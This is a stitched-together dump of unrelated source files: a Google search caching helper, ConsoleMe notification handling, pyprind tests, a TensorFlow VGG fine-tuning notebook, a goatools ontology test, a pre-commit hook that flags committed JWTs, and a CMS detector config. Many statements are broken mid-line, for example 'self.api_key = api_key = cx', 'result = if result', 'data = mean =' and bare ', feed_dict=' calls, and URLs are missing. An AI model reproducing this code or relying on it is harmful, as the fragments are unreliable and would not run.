WebpageCache.GOOGLE_PAUSE) time.sleep(WebpageCache.GOOGLE_PAUSE) WebpageCache.GOOGLE_PAUSE *= 2 result = self.get_page(url, check_html=False, force=True) def get_urls_from_google_search_with_backoff(self, keyword): results = self.get_from_google_search_with_backoff(keyword) return [(x['unescapedUrl'], x['titleNoFormatting']) for x in results] ################################################################ # GOOGLE SEARCH -- Custom Search CUSTOM_GOOGLE_SEARCH_URL = ''\ 'v1?key=%s&cx=%s&alt=json&safe=high&q=%s' def set_google_custom_search_keys(self, api_key, cx): self.api_key = api_key = cx def get_google_custom_search_url(self, keyword): answer = self.CUSTOM_GOOGLE_SEARCH_URL % \ (self.api_key,, urllib.quote(keyword)) return answer def get_from_google_custom_search(self, keyword, raw=False): url = self.get_google_custom_search_url(keyword) answer = self.get_page(url, check_html=False) if raw: return answer return json.loads(answer) def get_urls_from_google_custom_search(self, keyword): results = self.get_from_google_custom_search(keyword)['items'] return [(x['link'], x.get('title', '')) for x in results] def get_urls_from_google_hybrid_search(self, keyword): '''Return (cache_path, results)''' old_url = self.get_google_search_url(keyword) result = if result and not isinstance(result, WebLoadingError): # Found result in cache try: results = json.loads(result)['responseData']['results'] return (self.get_path(old_url), [(x['unescapedUrl'], x['titleNoFormatting']) for x in results]) except: # Stale bad cache ... pass # Use Custom search return (self.get_path(self.get_google_custom_search_url(keyword)), self.get_urls_from_google_custom_search(keyword)) class WebLoadingError(Exception): def __init__(self, msg): self.args = (msg,) self.msg = msg self.message = msg
# # Copyright (C) 2018 - 2021 <NAME> <<EMAIL>> # SPDX-License-Identifier: MIT # r"""ioinfo.constants to provide global constant variables. """ import os.path GLOB_MARKER: str = '*' PATH_SEP: str = os.path.sep # vim:sw=4:ts=4:et:
<gh_stars>1000+ import json as original_json import sys import time from collections import defaultdict from typing import Dict import sentry_sdk import ujson as json from asgiref.sync import sync_to_async from consoleme.config import config from consoleme.lib.cache import ( retrieve_json_data_from_redis_or_s3, store_json_results_in_redis_and_s3, ) from consoleme.lib.dynamo import UserDynamoHandler from consoleme.lib.json_encoder import SetEncoder from consoleme.lib.notifications.models import ( ConsoleMeUserNotification, GetNotificationsForUserResponse, ) from consoleme.lib.singleton import Singleton log = config.get_logger() class RetrieveNotifications(metaclass=Singleton): def __init__(self): self.last_update = 0 self.all_notifications = [] async def retrieve_all_notifications(self, force_refresh=False): if force_refresh or ( int(time.time()) - self.last_update > config.get( "get_notifications_for_user.notification_retrieval_interval", 20 ) ): self.all_notifications = await retrieve_json_data_from_redis_or_s3( redis_key=config.get("notifications.redis_key", "ALL_NOTIFICATIONS"), redis_data_type="hash", s3_bucket=config.get("notifications.s3.bucket"), s3_key=config.get( "notifications.s3.key", "notifications/all_notifications_v1.json.gz" ), default={}, ) self.last_update = int(time.time()) return self.all_notifications async def get_notifications_for_user( user, groups, max_notifications=config.get("get_notifications_for_user.max_notifications", 5), force_refresh=False, ) -> GetNotificationsForUserResponse: function = f"{__name__}.{sys._getframe().f_code.co_name}" log_data = { "function": function, "user": user, "max_notifications": max_notifications, "force_refresh": force_refresh, } current_time = int(time.time()) all_notifications = await RetrieveNotifications().retrieve_all_notifications( force_refresh ) unread_count = 0 notifications_for_user = [] for user_or_group in [user, *groups]: # Filter out identical notifications that were already captured via user-specific attribution. IE: "UserA" # performed an access deny operation locally under "RoleA" with session name = "UserA", so the generated # notification is tied to the user. However, "UserA" is a member of "GroupA", which owns RoleA. We want # to show the notification to members of "GroupA", as well as "UserA" but we don't want "UserA" to see 2 # notifications. notifications = all_notifications.get(user_or_group) if not notifications: continue notifications = json.loads(notifications) for notification_raw in notifications: try: # We parse ConsoleMeUserNotification individually instead of as an array # to account for future changes to the model that may invalidate older # notifications notification = ConsoleMeUserNotification.parse_obj(notification_raw) except Exception as e: log.error({**log_data, "error": str(e)}) sentry_sdk.capture_exception() continue if notification.version != 1: # Skip unsupported versions of the notification model continue if user in notification.hidden_for_users: # Skip this notification if it isn't hidden for the user continue seen = False for existing_user_notification_raw in notifications_for_user: existing_user_notification = ConsoleMeUserNotification.parse_obj( existing_user_notification_raw ) if ( notification.predictable_id == existing_user_notification.predictable_id ): seen = True if not seen: notifications_for_user.append(notification) # Filter out "expired" notifications notifications_for_user = [ v for v in notifications_for_user if v.expiration > current_time ] # Show newest notifications first notifications_for_user = sorted( notifications_for_user, key=lambda i: i.event_time, reverse=True ) # Increment Unread Count notifications_to_return = notifications_for_user[0:max_notifications] for notification in notifications_to_return: if user in notification.read_by_users or notification.read_by_all: notification.read_for_current_user = True continue unread_count += 1 return GetNotificationsForUserResponse( notifications=notifications_to_return, unread_count=unread_count ) async def fetch_notification(notification_id: str): ddb = UserDynamoHandler() notification = await sync_to_async(ddb.notifications_table.get_item)( Key={"predictable_id": notification_id} ) if notification.get("Item"): return ConsoleMeUserNotification.parse_obj(notification["Item"]) async def cache_notifications_to_redis_s3() -> Dict[str, int]: function = f"{__name__}.{sys._getframe().f_code.co_name}" current_time = int(time.time()) log_data = {"function": function} ddb = UserDynamoHandler() notifications_by_user_group = defaultdict(list) all_notifications_l = await ddb.parallel_scan_table_async(ddb.notifications_table) changed_notifications = [] for existing_notification in all_notifications_l: notification = ConsoleMeUserNotification.parse_obj(existing_notification) if current_time > notification.expiration: notification.expired = True changed_notifications.append(notification.dict()) for user_or_group in notification.users_or_groups: notifications_by_user_group[user_or_group].append(notification.dict()) if changed_notifications: ddb.parallel_write_table(ddb.notifications_table, changed_notifications) if notifications_by_user_group: for k, v in notifications_by_user_group.items(): notifications_by_user_group[k] = original_json.dumps(v, cls=SetEncoder) await store_json_results_in_redis_and_s3( notifications_by_user_group, redis_key=config.get("notifications.redis_key", "ALL_NOTIFICATIONS"), redis_data_type="hash", s3_bucket=config.get("notifications.s3.bucket"), s3_key=config.get( "notifications.s3.key", "notifications/all_notifications_v1.json.gz" ), ) log_data["num_user_groups_for_notifications"] = len( notifications_by_user_group.keys() ) log_data["num_notifications"] = len(all_notifications_l) log.debug(log_data) return { "num_user_groups_to_notify": len(notifications_by_user_group.keys()), "num_notifications": len(all_notifications_l), } async def write_notification(notification: ConsoleMeUserNotification): ddb = UserDynamoHandler() await sync_to_async(ddb.notifications_table.put_item)( Item=ddb._data_to_dynamo_replace(notification.dict()) ) await cache_notifications_to_redis_s3() return True
""" <NAME> 2014-2016 Python Progress Indicator Utility Author: <NAME> <<EMAIL>> License: BSD 3 clause Contributors: Code Repository: PyPI: """ import sys import time import pyprind n = 100 sleeptime = 0.02 def test_basic_percent(): perc = pyprind.ProgPercent(n) for i in range(n): time.sleep(sleeptime) perc.update() def test_stdout(): perc = pyprind.ProgPercent(n, stream=sys.stdout) for i in range(n): time.sleep(sleeptime) perc.update() def test_generator(): for i in pyprind.prog_percent(range(n), stream=sys.stdout): time.sleep(sleeptime) def test_monitoring(): perc = pyprind.ProgPercent(n, monitor=True) for i in range(n): time.sleep(sleeptime) perc.update() print(perc) def test_item_tracking(): items = ['file_%s.csv' % i for i in range(0, n)] perc = pyprind.ProgPercent(len(items)) for i in items: time.sleep(sleeptime) perc.update(item_id=i) def test_force_flush(): perc = pyprind.ProgPercent(n) for i in range(n): time.sleep(sleeptime) perc.update(force_flush=True) def test_update_interval(): perc = pyprind.ProgPercent(n, update_interval=4) for i in range(n): time.sleep(sleeptime) perc.update() if __name__ == "__main__": print('\n%s' % (80 * '=')) print('%s\n' % (80 * '=')) print('Testing Basic Percentage Indicator\n') test_basic_percent() print('\n%s' % (80 * '=')) print('%s\n' % (80 * '=')) print('Testing stdout Stream\n') test_stdout() print('\n%s' % (80 * '=')) print('%s\n' % (80 * '=')) print('Testing Percentage Indicator Generator\n') test_generator() print('\n%s' % (80 * '=')) print('%s\n' % (80 * '=')) print('Testing monitor function\n') test_monitoring() print('\n%s' % (80 * '=')) print('%s\n' % (80 * '=')) print('Testing Item Tracking\n') test_item_tracking() print('\n%s' % (80 * '=')) print('%s\n' % (80 * '=')) print('Testing Force Flush\n') test_force_flush() print('\n%s' % (80 * '=')) print('%s\n' % (80 * '=')) print('Testing Update Interval\n') test_update_interval()
# coding: utf-8 # # 使用预训练的VGG模型Fine-tune CNN # In[1]: # Import packs import numpy as np import os import from scipy.misc import imread, imresize import matplotlib.pyplot as plt import import skimage.transform import tensorflow as tf get_ipython().magic(u'matplotlib inline') cwd = os.getcwd() print ("Package loaded") print ("Current folder is %s" % (cwd) ) # In[2]: # 下载预先训练好的vgg-19模型,为Matlab的.mat格式,之后会用scipy读取 # (注意此版本模型与此处最新版本不同) import os.path if not os.path.isfile('./data/imagenet-vgg-verydeep-19.mat'): get_ipython().system(u'wget -O data/imagenet-vgg-verydeep-19.mat') # # 载入图像,调节尺寸,生成数据集 # In[3]: # Configure the locations of the images and reshaping sizes # ------------------------------------------------------------------- # paths = {"images/cats", "images/dogs"} imgsize = [64, 64] # The reshape size use_gray = 0 # Grayscale data_name = "data4vgg" # Save name valid_exts = [".jpg",".gif",".png",".tga", ".jpeg"] # ------------------------------------------------------------------- # imgcnt = 0 nclass = len(paths) for relpath in paths: fullpath = cwd + "/" + relpath flist = os.listdir(fullpath) for f in flist: if os.path.splitext(f)[1].lower() not in valid_exts: continue fullpath = os.path.join(fullpath, f) imgcnt = imgcnt + 1 # Grayscale def rgb2gray(rgb): if len(rgb.shape) is 3: return[...,:3], [0.299, 0.587, 0.114]) else: print ("Current Image is GRAY!") return rgb if use_gray: totalimg = np.ndarray((imgcnt, imgsize[0]*imgsize[1])) else: totalimg = np.ndarray((imgcnt, imgsize[0]*imgsize[1]*3)) totallabel = np.ndarray((imgcnt, nclass)) imgcnt = 0 for i, relpath in zip(range(nclass), paths): path = cwd + "/" + relpath flist = os.listdir(path) for f in flist: if os.path.splitext(f)[1].lower() not in valid_exts: continue fullpath = os.path.join(path, f) currimg = imread(fullpath) # Convert to grayscale if use_gray: grayimg = rgb2gray(currimg) else: grayimg = currimg # Reshape graysmall = imresize(grayimg, [imgsize[0], imgsize[1]])/255. grayvec = np.reshape(graysmall, (1, -1)) # Save totalimg[imgcnt, :] = grayvec totallabel[imgcnt, :] = np.eye(nclass, nclass)[i] imgcnt = imgcnt + 1 # Divide total data into training and test set randidx = np.random.randint(imgcnt, size=imgcnt) trainidx = randidx[0:int(4*imgcnt/5)] testidx = randidx[int(4*imgcnt/5):imgcnt] trainimg = totalimg[trainidx, :] trainlabel = totallabel[trainidx, :] testimg = totalimg[testidx, :] testlabel = totallabel[testidx, :] ntrain = trainimg.shape[0] nclass = trainlabel.shape[1] dim = trainimg.shape[1] ntest = testimg.shape[0] print ("Number of total images is %d (train: %d, test: %d)" % (imgcnt, ntrain, ntest)) print ("Shape of an image is (%d, %d, %d)" % (imgsize[0], imgsize[1], 3)) # # 定义VGG网络结构 # In[4]: def net(data_path, input_image): layers = ( 'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1', 'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2', 'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3', 'relu3_3', 'conv3_4', 'relu3_4', 'pool3', 'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3', 'relu4_3', 'conv4_4', 'relu4_4', 'pool4', 'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3', 'relu5_3', 'conv5_4', 'relu5_4' ) data = mean = data['normalization'][0][0][0] mean_pixel = np.mean(mean, axis=(0, 1)) weights = data['layers'][0] net = {} current = input_image for i, name in enumerate(layers): kind = name[:4] if kind == 'conv': kernels, bias = weights[i][0][0][0][0] # matconvnet: weights are [width, height, in_channels, out_channels] # tensorflow: weights are [height, width, in_channels, out_channels] kernels = np.transpose(kernels, (1, 0, 2, 3)) bias = bias.reshape(-1) current = _conv_layer(current, kernels, bias) elif kind == 'relu': current = tf.nn.relu(current) elif kind == 'pool': current = _pool_layer(current) net[name] = current assert len(net) == len(layers) return net, mean_pixel def _conv_layer(input, weights, bias): conv = tf.nn.conv2d(input, tf.constant(weights), strides=(1, 1, 1, 1), padding='SAME') return tf.nn.bias_add(conv, bias) def _pool_layer(input): return tf.nn.max_pool(input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1), padding='SAME') def preprocess(image, mean_pixel): return image - mean_pixel def unprocess(image, mean_pixel): return image + mean_pixel print ("VGG net ready") # # 使用VGG计算卷积特征图 # In[5]: # Preprocess trainimg_tensor = np.ndarray((ntrain, imgsize[0], imgsize[1], 3)) testimg_tensor = np.ndarray((ntest, imgsize[0], imgsize[1], 3)) for i in range(ntrain): currimg = trainimg[i, :] currimg = np.reshape(currimg, [imgsize[0], imgsize[1], 3]) trainimg_tensor[i, :, :, :] = currimg print ("Shape of trainimg_tensor is %s" % (trainimg_tensor.shape,)) for i in range(ntest): currimg = testimg[i, :] currimg = np.reshape(currimg, [imgsize[0], imgsize[1], 3]) testimg_tensor[i, :, :, :] = currimg print ("Shape of trainimg_tensor is %s" % (testimg_tensor.shape,)) # Get conv features VGG_PATH = cwd + "/data/imagenet-vgg-verydeep-19.mat" with tf.Graph().as_default(), tf.Session() as sess: with tf.device("/cpu:0"): img_placeholder = tf.placeholder(tf.float32 , shape=(None, imgsize[0], imgsize[1], 3)) nets, mean_pixel = net(VGG_PATH, img_placeholder) train_features = nets['relu5_4'].eval(feed_dict={img_placeholder: trainimg_tensor}) test_features = nets['relu5_4'].eval(feed_dict={img_placeholder: testimg_tensor}) print("Convolutional map extraction done") # # 卷积特征图的形状 # In[6]: print ("Shape of 'train_features' is %s" % (train_features.shape,)) print ("Shape of 'test_features' is %s" % (test_features.shape,)) # # 向量化 # In[7]: # Vectorize train_vectorized = np.ndarray((ntrain, 4*4*512)) test_vectorized = np.ndarray((ntest, 4*4*512)) for i in range(ntrain): curr_feat = train_features[i, :, :, :] curr_feat_vec = np.reshape(curr_feat, (1, -1)) train_vectorized[i, :] = curr_feat_vec for i in range(ntest): curr_feat = test_features[i, :, :, :] curr_feat_vec = np.reshape(curr_feat, (1, -1)) test_vectorized[i, :] = curr_feat_vec print ("Shape of 'train_vectorized' is %s" % (train_features.shape,)) print ("Shape of 'test_vectorized' is %s" % (test_features.shape,)) # # 定义finetuning的结构 # In[8]: # Parameters learning_rate = 0.0001 training_epochs = 100 batch_size = 100 display_step = 10 # tf Graph input x = tf.placeholder(tf.float32, [None, 4*4*512]) y = tf.placeholder(tf.float32, [None, nclass]) keepratio = tf.placeholder(tf.float32) # Network with tf.device("/cpu:0"): n_input = dim n_output = nclass weights = { 'wd1': tf.Variable(tf.random_normal([4*4*512, 1024], stddev=0.1)), 'wd2': tf.Variable(tf.random_normal([1024, n_output], stddev=0.1)) } biases = { 'bd1': tf.Variable(tf.random_normal([1024], stddev=0.1)), 'bd2': tf.Variable(tf.random_normal([n_output], stddev=0.1)) } def conv_basic(_input, _w, _b, _keepratio): # Input _input_r = _input # Vectorize _dense1 = tf.reshape(_input_r, [-1, _w['wd1'].get_shape().as_list()[0]]) # Fc1 _fc1 = tf.nn.relu(tf.add(tf.matmul(_dense1, _w['wd1']), _b['bd1'])) _fc_dr1 = tf.nn.dropout(_fc1, _keepratio) # Fc2 _out = tf.add(tf.matmul(_fc_dr1, _w['wd2']), _b['bd2']) # Return everything out = {'input_r': _input_r, 'dense1': _dense1, 'fc1': _fc1, 'fc_dr1': _fc_dr1, 'out': _out } return out # Functions! _pred = conv_basic(x, weights, biases, keepratio)['out'] cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=_pred, labels=y)) optm = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost) _corr = tf.equal(tf.argmax(_pred,1), tf.argmax(y,1)) accr = tf.reduce_mean(tf.cast(_corr, tf.float32)) init = tf.initialize_all_variables() print ("Network Ready to Go!") # # 优化 # In[9]: # Launch the graph sess = tf.Session() # Training cycle for epoch in range(training_epochs): avg_cost = 0. num_batch = int(ntrain/batch_size)+1 # Loop over all batches for i in range(num_batch): randidx = np.random.randint(ntrain, size=batch_size) batch_xs = train_vectorized[randidx, :] batch_ys = trainlabel[randidx, :] # Fit training using batch data, feed_dict={x: batch_xs, y: batch_ys, keepratio:0.7}) # Compute average loss avg_cost +=, feed_dict={x: batch_xs, y: batch_ys, keepratio:1.})/num_batch # Display logs per epoch step if epoch % display_step == 0: print ("Epoch: %03d/%03d cost: %.9f" % (epoch, training_epochs, avg_cost)) train_acc =, feed_dict={x: batch_xs, y: batch_ys, keepratio:1.}) print (" Training accuracy: %.3f" % (train_acc)) test_acc =, feed_dict={x: test_vectorized, y: testlabel, keepratio:1.}) print (" Test accuracy: %.3f" % (test_acc)) print ("Optimization Finished!")
#!/usr/bin/env python """Test that GoSubDag contains ancestors from only the user-specified relationships""" # tests/ # goatools/gosubdag/ # goatools/gosubdag/ # goatools/gosubdag/ # goatools/godag/ # goatools/ from __future__ import print_function __copyright__ = "Copyright (C) 2016-2019, <NAME>, <NAME>, All rights reserved." from os.path import join from os import system import sys ## import timeit ## import datetime import collections as cx from goatools.base import get_godag from goatools.godag.consts import RELATIONSHIP_SET from goatools.gosubdag.gosubdag import GoSubDag from goatools.test_data.wr_subobo import WrSubObo from tests.utils import REPO # pylint: disable=line-too-long,unused-variable def test_gosubdag_relationships(wr_new_obo_subset=False): """Test that GoSubDag contains ancestors from only the user-specified relationships""" # Leaf GO: viral triggering of virus induced gene silencing goid_chosen = 'GO:0060150' # Load GODag with all relationships fin_obo = join(REPO, "tests/data/i126/viral_gene_silence.obo") # "go-basic.obo") godag_r0 = get_godag(fin_obo, loading_bar=None) godag_r1 = get_godag(fin_obo, loading_bar=None, optional_attrs=['relationship']) file_sub = join(REPO, "tests/data/viral_gene_silence.obo") # Get all GO terms above this low-level GO ID using all relationships if wr_new_obo_subset: _wr_sub_obo(file_sub, goid_chosen, godag_r1, fin_obo) # RELATIONSHIPS: None gosubdag_r0 = GoSubDag(set([goid_chosen]), godag_r0) assert len(gosubdag_r0.rcntobj.go2ancestors[goid_chosen]) == 12 # RELATIONSHIPS: ALL gosubdag_r1 = GoSubDag(set([goid_chosen]), godag_r1, relationships=True) assert gosubdag_r1.relationships == RELATIONSHIP_SET #### set(['part_of', 'regulates', 'positively_regulates', 'negatively_regulates']) assert len(gosubdag_r1.rcntobj.go2ancestors[goid_chosen]) == 50 # RELATIONSHIPS: part_of gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'part_of'}) assert gosubdag_rp.relationships == set(['part_of']) rp_par = gosubdag_rp.rcntobj.go2ancestors[goid_chosen] assert 'GO:0016441' not in gosubdag_rp.go2obj, '**FATAL: REGULATION TERM GoSubDag(part_of) go2obj' assert 'GO:0016441' not in rp_par, '**FATAL: REGULATION TERM GoSubDag(part_of) go2parents' # RELATIONSHIPS: regulates gosubdag_rr = GoSubDag(set([goid_chosen]), godag_r1, relationships={'regulates'}) assert gosubdag_rr.relationships == set(['regulates']) rp_par = gosubdag_rr.rcntobj.go2ancestors[goid_chosen] # assert 'GO:0016441' not in gosubdag_rp.go2obj, '**FATAL: REGULATION TERM GoSubDag(part_of) go2obj' # assert 'GO:0016441' not in rp_par, '**FATAL: REGULATION TERM GoSubDag(part_of) go2parents' # RELATIONSHIPS: positively_regulates gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'positively_regulates'}) assert gosubdag_rp.relationships == set(['positively_regulates']) rp_par = gosubdag_rp.rcntobj.go2ancestors[goid_chosen] # RELATIONSHIPS: negatively_regulates gosubdag_rn = GoSubDag(set([goid_chosen]), godag_r1, relationships={'negatively_regulates'}) assert gosubdag_rn.relationships == set(['negatively_regulates']) rp_par = gosubdag_rn.rcntobj.go2ancestors[goid_chosen] # RELATIONSHIPS: regulates positively_regulates negatively_regulates regs = {'positively_regulates', 'negatively_regulates'} gosubdag_rnp = GoSubDag(set([goid_chosen]), godag_r1, relationships=regs) assert gosubdag_rnp.relationships == regs rp_par = gosubdag_rnp.rcntobj.go2ancestors[goid_chosen] _run_baseline_r0(gosubdag_r0, gosubdag_r1) # BASELINE r1: Test that GOTerm.get_all_upper() is the same as GoSubDag ancestors for goid, term in gosubdag_r1.go2obj.items(): ancestors_r1 = gosubdag_r1.rcntobj.go2ancestors.get(goid, set()) assert ancestors_r1 == term.get_all_upper() #### # Test that #### gosubdag_rp = GoSubDag(set([goid_chosen]), godag_r1, relationships={'part_of'}, prt=sys.stdout) #### for goid, dag_term in godag_r1.items(): #### if goid in gosubdag_r1.rcntobj.go2ancestors: #### ancestors = gosubdag_rp.rcntobj.go2ancestors[goid] #### sub_term = gosubdag_rp.go2obj[goid] #### reldict = sub_term.relationship.items() #### # print(goid) #### # print('DAG', sorted(dag_term.get_all_upper())) #### # print('SUB', sorted(sub_term.get_all_upper())) #### # print('ANS', sorted(ancestors)) #### # for rel, pterms in cx.OrderedDict(reldict).items(): #### # print(rel, ' '.join(sorted( for o in pterms))) #### # print('') #### print(gosubdag_rp.relationships) #### #assert 'GO:0016441' not in gosubdag_rp.rcntobj.go2ancestors['GO:0060150'] #### assert 'GO:0016441' in gosubdag_r1.go2nt #### assert 'GO:0010467' in gosubdag_r1.go2nt def _run_baseline_r0(gosubdag_r0, gosubdag_r1): """BASELINE r0: Test that GOTerm.get_all_parents() == GoSubDag ancestors""" r1_ancestors_more = set() # Loop through r0 GO IDs for goid, term in gosubdag_r0.go2obj.items(): ancestors_r0 = gosubdag_r0.rcntobj.go2ancestors.get(goid, set()) ancestors_r1 = gosubdag_r1.rcntobj.go2ancestors.get(goid, set()) assert ancestors_r0 == term.get_all_parents() assert ancestors_r0.issubset(ancestors_r1) if len(ancestors_r0) < len(ancestors_r1): r1_ancestors_more.add(goid) assert r1_ancestors_more print('{N} r1 GO terms in GoSubDag have more ancestors than r0'.format( N=len(r1_ancestors_more))) # scripts/ --go_file=i126_goids_baseline.txt -r --obo=tests/data/viral_gene_silence.obo -o i126_goids_baseline.png fout_gos = 'i126_goids_baseline.txt' with open(fout_gos, 'w') as prt: prt.write('#cafffb {SRC_GO}\n'.format(SRC_GO=next(iter(gosubdag_r0.go_sources)))) _prt_goterms(r1_ancestors_more, gosubdag_r1.go2nt, prt) print(' WROTE: {GOs}'.format(GOs=fout_gos)) def _prt_goterms(goids, go2nt, prt): """Print details of GO terms""" fmt = ('#ffd1df {GO} # {NS} {dcnt:5} {childcnt:3} ' 'L{level:02} D{depth:02} R{reldepth:02} {D1:5} {REL} {rel} {GO_name}\n') nts = [nt for go, nt in go2nt.items() if go in goids] for ntd in sorted(nts, key=lambda nt: nt.dcnt, reverse=True): prt.write(fmt.format(**ntd._asdict())) #cafffb GO:0060150 #ffd1df GO:0050794 # BP 8278 64 D03 R03 regulation of cellular process #ffd1df GO:0019222 # BP 3382 20 D03 R03 regulation of metabolic process #ffd1df GO:0048522 # BP 2417 65 D04 R04 positive regulation of cellular process #ffd1df GO:0060255 # BP 2130 20 D04 R04 regulation of macromolecule metabolic process #ffd1df GO:0010468 # BP 862 20 D05 R05 regulation of gene expression #ffd1df GO:0060968 # BP 53 4 D06 R08 regulation of gene silencing #ffd1df GO:0060147 # BP 24 4 D07 R09 regulation of posttranscriptional gene silencing #ffd1df GO:0060148 # BP 8 3 D08 R10 positive regulation of posttranscriptional gene silencing #ffd1df GO:0060150 # BP 0 0 D09 R11 viral triggering of virus induced gene silencing # - Generate GO DAG subset for this test --------------------------------------------------------- def _wr_sub_obo(fout_obo, goid_chosen, godag_r1, fin_obo): """Sub plot used for visualizing this test file's elements""" # Load GO-DAG: Load optional 'relationship' godag = {go:o for go, o in godag_r1.items() if go == o.item_id} _prt_rtel_ctr(godag) rels_all = set(['part_of', 'regulates', 'negatively_regulates', 'positively_regulates']) goids_leaf_all = set( for o in godag.values() if not o.children) gosubdag_r1 = GoSubDag(goids_leaf_all, godag, relationships=True, prt=sys.stdout) goids_src_r1_all = _get_leafs_w_relsinhier(rels_all, gosubdag_r1) gosubdag_r1.prt_goids(goids_src_r1_all) # Pick one of the GO IDs as a source for the subset DAG gosubdag_viral = GoSubDag({goid_chosen}, godag, relationships=True, prt=sys.stdout) goids_viral = set(gosubdag_viral.go2obj.keys()) with open(fout_obo, 'w') as prt: WrSubObo.prt_goterms(fin_obo, goids_viral, prt) print('{N} GO IDs WROTE: {OBO}'.format(N=len(goids_viral), OBO=fout_obo)) # Plot obo subset pat_r1 = '{REPO}/scripts/ {GO} -o {PNG} -r' pat_r0 = '{REPO}/scripts/ {GO} -o {PNG}' system(pat_r1.format(REPO=REPO, PNG=fout_obo.replace('.obo', '_r1.png'), GO=goid_chosen)) system(pat_r0.format(REPO=REPO, PNG=fout_obo.replace('.obo', '_r0.png'), GO=goid_chosen)) def _get_leafs_w_relsinhier(rels_usr, gosubdag_r1): """Get GO IDs that have all relationships up their hierarchy.""" gos_r1_relsinhier = set() goids_leaf = set( for o in gosubdag_r1.go2obj.values() if not o.children) for goid in goids_leaf: go_parents = gosubdag_r1.rcntobj.go2ancestors[goid] rels = set(k for p in go_parents for k in gosubdag_r1.go2obj[p].relationship.keys()) if rels == rels_usr: gos_r1_relsinhier.add(goid) return gos_r1_relsinhier def _prt_rtel_ctr(godag): """Print the count of relationships.""" objs_r1_all = set(o for o in godag.values() if o.relationship.keys()) octr = cx.Counter(k for o in objs_r1_all for k in o.relationship.keys()) # objs_r1_sub = set( for o in objs_r1_all if not rels_all.isdisjoint(o.relationship.keys())) print('{N:6,} GO Terms have relationships.'.format(N=len(objs_r1_all))) for key, cnt in octr.most_common(): print('{N:6,} {REL}'.format(N=cnt, REL=key)) # def _chk_child_parent(go2o_dag, go2o_sub): # """Check the differences between the two go2obb dicts.""" # pass if __name__ == '__main__': test_gosubdag_relationships(len(sys.argv) != 1) # Copyright (C) 2016-2019, <NAME>, <NAME>, All rights reserved.
#!/usr/bin/python3 # This script runs whenever a user tries to commit something in this repo. # It checks the commit for any text that resembled an encoded JSON web token, # and asks the user to verify that they want to commit a JWT if it finds any. import sys import subprocess import re import base64 import binascii import unittest # run test like so: # (cd .githooks/; python -m unittest class TestStringMethods(unittest.TestCase): def test_jwts(self): self.assertTrue(contains_jwt(["<KEY>"])) self.assertTrue(contains_jwt(["<KEY>"])) def test_ok(self): self.assertFalse(contains_jwt(["test test"])) self.assertFalse(contains_jwt(["thisisnotajwteventhoughitisalongstring"])) def contains_jwt(lines): jwtPattern = re.compile('JWT|iat|name|sub|alg|exp|k') raiseIssue = False for line in lines: # try to find long (20+ character) words consisting only of valid JWT characters longTokens = re.findall("[A-Za-z0-9_=-]{20,}", line) # try to decode any found tokens and see if they look like a JSONfragment # where :look like a JSON fragment" is defined as "contains any of the words in the 'jwtPattern' regex pattern" for token in longTokens: try: # python's base64 decoder fails if padding is missing; but does not fail if there's # extra padding; so always add padding utfOut = base64.urlsafe_b64decode(token+'==').decode("utf-8") match = if match: print("Probable JWT found in commit: " + token + " gets decoded into: " + utfOut) raiseIssue = True # be very specific about the exceptions we ignore: except (UnicodeDecodeError, binascii.Error) as e: continue return raiseIssue def main(): #get git diff lines lines = subprocess.check_output(['git', 'diff', '--staged']).decode("utf-8").split('\n') # filter out short lines and lines that don't begin with a '+' to only # test longer, newly added text filteredLines = list(filter(lambda line : len(line) > 20 and line[0] == '+', lines)) # found a likely JWT, send user through prompt sequence to double check if contains_jwt(filteredLines): prompt = "This commit appears to add a JSON web token, which is often accidental and can be problematic (unless it's for a test). Are you sure you want to commit these changes? (y/n): " failCount = 0 while True: inputLine = input(prompt).lower() if len(inputLine) > 0 and inputLine[0] == 'y': print("OK, proceeding with commit") return 0 elif len(inputLine) > 0 and inputLine[0] == 'n': print("Aborting commit") return 1 elif failCount == 0: prompt = "Please answer with 'y' or 'n'. Do you wish to proceed with this commit?: " elif failCount == 1: prompt = "That's still neither a 'y' nor an 'n'. Do you wish to proceed with this commit?: " else: prompt = "You've entered an incorrect input " + str(failCount) + " times now. Please respond with 'y' or 'n' (sans apostrophes) regarding whether or not you wish to proceed with this commit which possibly contains a JWT: " failCount += 1 else: print("No likely JWTs found, proceeding with commit") return 0 if __name__ == "__main__": sys.exit(main())
<reponame>ckamtsikis/cmssw<filename>DQM/CSCMonitorModule/python/<gh_stars>100-1000 import FWCore.ParameterSet.Config as cms #-------------------------- # Masked HW Elements #-------------------------- CSCMaskedHW = cms.untracked.vstring( # == Post LS1 - All ME4/2 chambers should be enabled # == mask most or ME+4/2 chambers, except 9,10,11,12,13 #'1,4,2,1,*,*,*', #'1,4,2,2,*,*,*', #'1,4,2,3,*,*,*', #'1,4,2,4,*,*,*', #'1,4,2,5,*,*,*', #'1,4,2,6,*,*,*', #'1,4,2,7,*,*,*', #'1,4,2,8,*,*,*', #'1,4,2,14,*,*,*', #'1,4,2,15,*,*,*', #'1,4,2,16,*,*,*', #'1,4,2,17,*,*,*', #'1,4,2,18,*,*,*', #'1,4,2,19,*,*,*', #'1,4,2,20,*,*,*', #'1,4,2,21,*,*,*', #'1,4,2,22,*,*,*', #'1,4,2,23,*,*,*', #'1,4,2,24,*,*,*', #'1,4,2,25,*,*,*', #'1,4,2,26,*,*,*', #'1,4,2,27,*,*,*', #'1,4,2,28,*,*,*', #'1,4,2,29,*,*,*', #'1,4,2,30,*,*,*', #'1,4,2,31,*,*,*', #'1,4,2,32,*,*,*', #'1,4,2,33,*,*,*', #'1,4,2,34,*,*,*', #'1,4,2,35,*,*,*', #'1,4,2,36,*,*,*', # == mask all ME-4/2 chambers #'2,4,2,*,*,*,*', )
